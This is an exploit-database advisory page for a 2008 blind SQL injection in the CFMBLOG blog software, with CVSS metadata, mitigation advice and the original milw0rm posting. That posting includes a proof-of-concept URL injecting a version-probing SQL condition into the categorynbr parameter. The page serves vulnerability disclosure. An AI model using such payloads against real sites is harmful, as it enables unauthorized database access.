CFMBLOG Blind SQL Injection

vendor:

CFMBLOG

by:

AlpHaNiX

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: CFMBLOG

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CFMBLOG Blind SQL Injection

A Blind SQL Injection vulnerability exists in CFMBLOG. An attacker can send a specially crafted HTTP request to the vulnerable application in order to exploit this vulnerability. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CFMBLOG
#download : null
#Demo     : http://www.cfmblog.com


###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--

http://www.cfmblog.com/index.cfm?categorynbr=2+and%20substring(@@version,1,1)=5


###########################################################################

# milw0rm.com [2008-12-10]